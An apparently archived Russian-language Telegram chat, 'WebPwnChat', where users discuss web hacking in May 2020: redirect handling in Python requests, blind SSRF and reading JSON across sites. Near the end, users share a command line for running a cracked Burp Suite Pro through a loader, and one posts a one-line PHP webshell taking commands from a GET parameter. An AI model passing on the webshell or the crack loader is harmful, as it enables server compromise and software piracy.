Size: a a a

2020 May 09

H

HaCk3D in WebPwnChat
I S
allow_redirects=False
+
источник

P

Pulsar in WebPwnChat
всё разобрался. спасибо
источник

P

Pulsar in WebPwnChat
а , response.headers['Location'] еще покажет куда редиректнуло
источник

D

DiMaX in WebPwnChat
Что можно сделать через blind ssrf кроме shellshock?
источник

A

Artem in WebPwnChat
Pulsar
а , response.headers['Location'] еще покажет куда редиректнуло
если тебе нужна вся цепочка, то там есть .history или типа того (ищи в доках).
источник

A

Artem in WebPwnChat
покажет коды и все url
источник

F

Friend in WebPwnChat
DiMaX
Что можно сделать через blind ssrf кроме shellshock?
источник
2020 May 10

MW

Mino Wesa in WebPwnChat
Стоит X-Content-Type-Options: nosniff, возвращает application/json, возможно ли каким-либо образом вытащить данные с другого сайта? Пробывал в <script src..>, безуспешно.
источник

I

Ivan in WebPwnChat
если бы каждый app/json можно было бы вытащить через <script src> , мир бы пребывал в огне
источник

I

Ivan in WebPwnChat
тебе только некорректно настроенный корс помог бы
источник

F

Friend in WebPwnChat
Есть нормальный кряк последнего бёрпа ?
источник

А

Алексей in WebPwnChat
Friend
Есть нормальный кряк последнего бёрпа ?
Surferxyz
источник

᠌᠌Sh1Yo in WebPwnChat
"C:\Program Files\Java\jdk-13.0.2\bin\java.exe" -noverify -javaagent:BurpSuiteLoader.jar -jar burpsuite_pro_v2020.4.jar
источник

᠌᠌Sh1Yo in WebPwnChat
источник

᠌᠌Sh1Yo in WebPwnChat
Только хз работает или нет, не пробовал
источник

BF

Billy Fox in WebPwnChat
᠌᠌Sh1Yo
Только хз работает или нет, не пробовал
Работает :З
источник

I0

Iframe 0x01 in WebPwnChat
Работает, только лучше запускать бурп этим лоадером, а активировать старым.

Потом сделать батник который будет в один клик все это запускать)
источник

l

lazest in WebPwnChat
Ребят, кто какой webshell по советует?
b364k не работает, invoke(как-то) пашет
источник

l

lazest in WebPwnChat
И на подобии обусификатора (надеюсь правильно написал) php fopa у кого есть? Раньше был сайт, сейчас домен продаётся
источник

AS

Andrew Sparks in WebPwnChat
lazest
Ребят, кто какой webshell по советует?
b364k не работает, invoke(как-то) пашет
<?=system($_GET['c']); ?>
источник